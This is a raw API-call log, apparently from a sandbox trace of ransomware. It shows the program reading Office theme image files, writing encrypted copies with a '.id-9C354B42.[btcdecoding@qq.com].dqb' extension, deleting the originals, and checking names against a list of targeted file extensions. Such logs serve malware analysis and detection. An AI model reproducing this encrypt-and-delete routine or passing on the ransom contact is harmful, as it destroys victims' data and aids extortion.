(lpString="THMBNAIL.PNG") returned 12 [0044.418] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.418] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=16738) returned 1 [0044.418] CloseHandle (hObject=0x1f8) returned 1 [0044.419] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png")) returned 0x20 [0044.419] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.419] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.419] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.419] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.419] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.419] GetLastError () returned 0x0 [0044.419] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x4162, lpOverlapped=0x0) returned 1 [0044.427] WriteFile (in: hFile=0x200, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x4170, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x4170, lpOverlapped=0x0) returned 1 [0044.428] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0044.428] WriteFile (in: hFile=0x200, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.428] SetEndOfFile (hFile=0x200) returned 1 [0044.428] CloseHandle (hObject=0x200) returned 1 [0044.428] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.428] SetEndOfFile (hFile=0x1f8) returned 1 [0044.429] CloseHandle (hObject=0x1f8) returned 1 [0044.429] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.429] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png")) returned 1 [0044.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0044.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0044.430] lstrlenW (lpString=".doc") returned 4 [0044.430] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.430] lstrlenW (lpString=".docx") returned 5 [0044.430] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.430] lstrlenW (lpString=".pdf") returned 4 [0044.430] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.430] lstrlenW (lpString=".xls") returned 4 [0044.430] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.430] lstrlenW (lpString=".xlsx") returned 5 [0044.430] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.430] lstrlenW (lpString=".ppt") returned 4 [0044.430] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0044.430] lstrlenW (lpString=".zip") returned 4 [0044.430] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.430] lstrlenW (lpString=".rar") returned 4 [0044.430] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.430] lstrlenW (lpString=".bz2") returned 4 [0044.430] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.430] lstrlenW (lpString=".7z") returned 3 [0044.430] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0044.430] lstrlenW (lpString=".dbf") returned 4 [0044.430] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0044.430] lstrlenW (lpString=".1cd") returned 4 [0044.430] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0044.430] lstrlenW (lpString=".jpg") returned 4 [0044.430] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0044.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0044.430] lstrlenW (lpString=".doc") returned 4 [0044.431] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.431] lstrlenW (lpString=".docx") returned 5 [0044.431] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.431] lstrlenW (lpString=".pdf") returned 4 [0044.431] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.431] lstrlenW (lpString=".xls") returned 4 [0044.431] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.431] lstrlenW (lpString=".xlsx") returned 5 [0044.431] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.431] lstrlenW (lpString=".ppt") returned 4 [0044.431] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0044.431] lstrlenW (lpString=".zip") returned 4 [0044.431] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.431] lstrlenW (lpString=".rar") returned 4 [0044.431] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.431] lstrlenW (lpString=".bz2") returned 4 [0044.431] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.431] lstrlenW (lpString=".7z") returned 3 [0044.431] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0044.431] lstrlenW (lpString=".dbf") returned 4 [0044.431] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0044.431] lstrlenW (lpString=".1cd") returned 4 [0044.431] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0044.431] lstrlenW (lpString=".jpg") returned 4 [0044.431] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.431] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0044.431] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.432] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.432] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1439) returned 1 [0044.432] CloseHandle (hObject=0x1f8) returned 1 [0044.432] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif")) returned 0x20 [0044.432] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.432] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.432] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.432] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.432] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.434] GetLastError () returned 0x0 [0044.434] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x59f, lpOverlapped=0x0) returned 1 [0044.435] WriteFile (in: hFile=0x200, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x5a0, lpOverlapped=0x0) returned 1 [0044.436] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0044.436] WriteFile (in: hFile=0x200, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.436] SetEndOfFile (hFile=0x200) returned 1 [0044.436] CloseHandle (hObject=0x200) returned 1 [0044.436] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.436] SetEndOfFile (hFile=0x1f8) returned 1 [0044.437] CloseHandle (hObject=0x1f8) returned 1 [0044.437] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.437] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif")) returned 1 [0044.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0044.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0044.438] lstrlenW (lpString=".doc") returned 4 [0044.438] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.438] lstrlenW (lpString=".docx") returned 5 [0044.438] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.438] lstrlenW (lpString=".pdf") returned 4 [0044.438] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.438] lstrlenW (lpString=".xls") returned 4 [0044.438] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.438] lstrlenW (lpString=".xlsx") returned 5 [0044.438] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.438] lstrlenW (lpString=".ppt") returned 4 [0044.438] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0044.438] lstrlenW (lpString=".zip") returned 4 [0044.438] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.438] lstrlenW (lpString=".rar") returned 4 [0044.438] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.438] lstrlenW (lpString=".bz2") returned 4 [0044.438] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.438] lstrlenW (lpString=".7z") returned 3 [0044.438] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0044.438] lstrlenW (lpString=".dbf") returned 4 [0044.438] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0044.438] lstrlenW (lpString=".1cd") returned 4 [0044.438] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0044.438] lstrlenW (lpString=".jpg") returned 4 [0044.438] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0044.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0044.439] lstrlenW (lpString=".doc") returned 4 [0044.439] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.439] lstrlenW (lpString=".docx") returned 5 [0044.439] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.439] lstrlenW (lpString=".pdf") returned 4 [0044.439] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.439] lstrlenW (lpString=".xls") returned 4 [0044.439] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.439] lstrlenW (lpString=".xlsx") returned 5 [0044.439] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.439] lstrlenW (lpString=".ppt") returned 4 [0044.439] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0044.439] lstrlenW (lpString=".zip") returned 4 [0044.439] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.439] lstrlenW (lpString=".rar") returned 4 [0044.439] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.439] lstrlenW (lpString=".bz2") returned 4 [0044.439] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.439] lstrlenW (lpString=".7z") returned 3 [0044.439] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0044.439] lstrlenW (lpString=".dbf") returned 4 [0044.439] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0044.439] lstrlenW (lpString=".1cd") returned 4 [0044.439] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0044.439] lstrlenW (lpString=".jpg") returned 4 [0044.439] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.440] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0044.440] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.440] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.440] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=37112) returned 1 [0044.440] CloseHandle (hObject=0x1f8) returned 1 [0044.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png")) returned 0x20 [0044.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.440] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.440] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.440] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.440] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.441] GetLastError () returned 0x0 [0044.441] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x90f8, lpOverlapped=0x0) returned 1 [0044.741] WriteFile (in: hFile=0x200, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x9100, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x9100, lpOverlapped=0x0) returned 1 [0044.744] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0044.744] WriteFile (in: hFile=0x200, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.744] SetEndOfFile (hFile=0x200) returned 1 [0044.744] CloseHandle (hObject=0x200) returned 1 [0044.744] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.744] SetEndOfFile (hFile=0x1f8) returned 1 [0044.745] CloseHandle (hObject=0x1f8) returned 1 [0044.745] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.745] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png")) returned 1 [0044.745] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0044.745] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0044.746] lstrlenW (lpString=".doc") returned 4 [0044.746] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.746] lstrlenW (lpString=".docx") returned 5 [0044.746] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.746] lstrlenW (lpString=".pdf") returned 4 [0044.746] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.746] lstrlenW (lpString=".xls") returned 4 [0044.746] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.746] lstrlenW (lpString=".xlsx") returned 5 [0044.746] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.746] lstrlenW (lpString=".ppt") returned 4 [0044.746] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0044.746] lstrlenW (lpString=".zip") returned 4 [0044.746] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.746] lstrlenW (lpString=".rar") returned 4 [0044.746] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.746] lstrlenW (lpString=".bz2") returned 4 [0044.746] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.746] lstrlenW (lpString=".7z") returned 3 [0044.746] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0044.746] lstrlenW (lpString=".dbf") returned 4 [0044.746] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0044.746] lstrlenW (lpString=".1cd") returned 4 [0044.746] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0044.746] lstrlenW (lpString=".jpg") returned 4 [0044.746] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0044.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0044.746] lstrlenW (lpString=".doc") returned 4 [0044.746] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.746] lstrlenW (lpString=".docx") returned 5 [0044.747] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.747] lstrlenW (lpString=".pdf") returned 4 [0044.747] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.747] lstrlenW (lpString=".xls") returned 4 [0044.747] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.747] lstrlenW (lpString=".xlsx") returned 5 [0044.747] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.747] lstrlenW (lpString=".ppt") returned 4 [0044.747] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0044.747] lstrlenW (lpString=".zip") returned 4 [0044.747] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.747] lstrlenW (lpString=".rar") returned 4 [0044.747] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.747] lstrlenW (lpString=".bz2") returned 4 [0044.747] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.747] lstrlenW (lpString=".7z") returned 3 [0044.747] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0044.747] lstrlenW (lpString=".dbf") returned 4 [0044.747] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0044.747] lstrlenW (lpString=".1cd") returned 4 [0044.747] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0044.747] lstrlenW (lpString=".jpg") returned 4 [0044.747] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.747] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0044.747] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.747] 